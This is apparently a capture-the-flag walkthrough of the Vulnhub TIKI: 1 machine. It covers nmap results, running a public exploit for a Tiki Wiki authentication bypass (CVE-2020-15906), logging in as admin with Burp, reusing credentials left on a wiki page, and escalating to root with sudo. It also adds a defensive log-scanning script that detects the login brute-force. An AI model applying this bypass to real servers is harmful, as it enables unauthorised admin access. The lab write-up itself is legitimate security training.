Vulnhub - TIKI: 1
Introduction
Oh no, our webserver got compromised. The attacker used an 0day, so we don't know how he got into the admin panel. Investigate that.
This is an OSCP Prep Box; it's based on a CVE I recently found. It's on the OSCP lab machines' level.
This box is on the NetSecFocus Admin list of OSCP-like machines. It’s TIKI: 1 from vulnhub.
Ports
Ports are SSH, HTTP and SMB (139 and 445), but given the introduction it sounds like the webserver is our target. Also, nmap said:
80/tcp open  http  syn-ack ttl 64 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
| http-robots.txt: 1 disallowed entry
|_/tiki/
Let’s start there.
TIKI
Tiki is Tiki Wiki, and it's not hard to find the recent CVE for it: CVE-2020-15906, found by the machine's creator. Reckon it's what we want?
Searchsploit
It’s on searchsploit:
Tiki Wiki CMS Groupware 21.1 - Authentication Bypass php/webapps/48927.py
We can mirror this and run it:
root@kali:/opt/vulnhub/tiki# python3 48927.py 192.168.1.168
Admin Password got removed.
Use BurpSuite to login into admin without a password
The vulnerability is that an attacker can brute-force a Tiki Wiki admin account until it is locked after 50 invalid login attempts. After that, an empty password authenticates as the administrator and gives full account access.
The web page won't let you submit a blank password field, but Burp Suite is fine with it, so that's where it comes in. Then you can do "show response in browser" and we are logged in as admin.
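The tell-tale sign of this bypass on the server side is the burst of login POSTs needed to trip the lockout. As a defensive counterpart, here is an added example (my own code, not from the box, the exploit or Tiki itself) that scans Apache access-log lines and flags any source that POSTs to the Tiki login endpoint at least the lockout threshold of times within a short window. The login path, the window size and the sample log lines are assumptions I constructed for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LOGIN_PATH = "/tiki/tiki-login.php"   # assumed Tiki login endpoint
LOCKOUT_THRESHOLD = 50               # Tiki locks the account after 50 invalid attempts
WINDOW = timedelta(minutes=5)        # assumed detection window

# Apache combined log format: ip ident user [ts] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Parse one access-log line; return (ip, ts, method, path, status) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path"), int(m.group("status"))

def find_lockout_bruteforce(lines, threshold=LOCKOUT_THRESHOLD, window=WINDOW):
    """Return {ip: total_login_posts} for sources that hit the login endpoint
    at least `threshold` times inside any sliding `window`."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _ = rec
        if method == "POST" and path.split("?")[0] == LOGIN_PATH:
            posts[ip].append(ts)
    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:   # slide window forward
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged

def make_line(ip, ts, status=200):
    return f'{ip} - - [{ts.strftime("%d/%b/%Y:%H:%M:%S %z")}] "POST {LOGIN_PATH} HTTP/1.1" {status} 512'

def sample_log():
    """Constructed sample: 60 rapid POSTs from one source, 3 spaced-out ones from another."""
    base = datetime(2020, 10, 1, 12, 0, 0, tzinfo=timezone.utc)
    noisy = [make_line("192.0.2.10", base + timedelta(seconds=i)) for i in range(60)]
    quiet = [make_line("192.0.2.20", base + timedelta(minutes=2 * i)) for i in range(3)]
    return noisy + quiet
```

Only the burst source crosses the 50-attempt threshold; lowering the threshold shows the quiet source as well, which is the knob to tune against your own baseline.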
Enumerate
I looked around for a way to upload a shell, but there doesn’t appear to be one (that I could find). I could upload a shell as a ZIP and unzip it, but could only download the resulting file and not run it. Fortunately our box user has left his credentials on the site to find.
http://192.168.1.168/tiki/tiki-index.php?page=Credentials
Privesc
We can SSH in as our user, and since he is a sudoer it's all over:
silky@ubuntu:~$ sudo -l
[sudo] Passwort für silky:
Passende Defaults-Einträge für silky auf ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
Der Benutzer silky darf die folgenden Befehle auf ubuntu ausführen:
(ALL : ALL) ALL
silky@ubuntu:~$ sudo su
root@ubuntu:/home/silky# cd /root
root@ubuntu:~# ls -lash
root@ubuntu:~# cat flag.txt
ASCII art removed
You did it ^^
I hope you had fun.
Share your flag with me on Twitter: S1lky_1337
flag:88d8120f434c3b4221937a8cd0668588
root@ubuntu:~# id;hostname
uid=0(root) gid=0(root) Gruppen=0(root)
ubuntu
BTW, Google Translate says:
Der Benutzer silky darf die folgenden Befehle auf ubuntu ausführen
means
The user silky is allowed to execute the following commands on ubuntu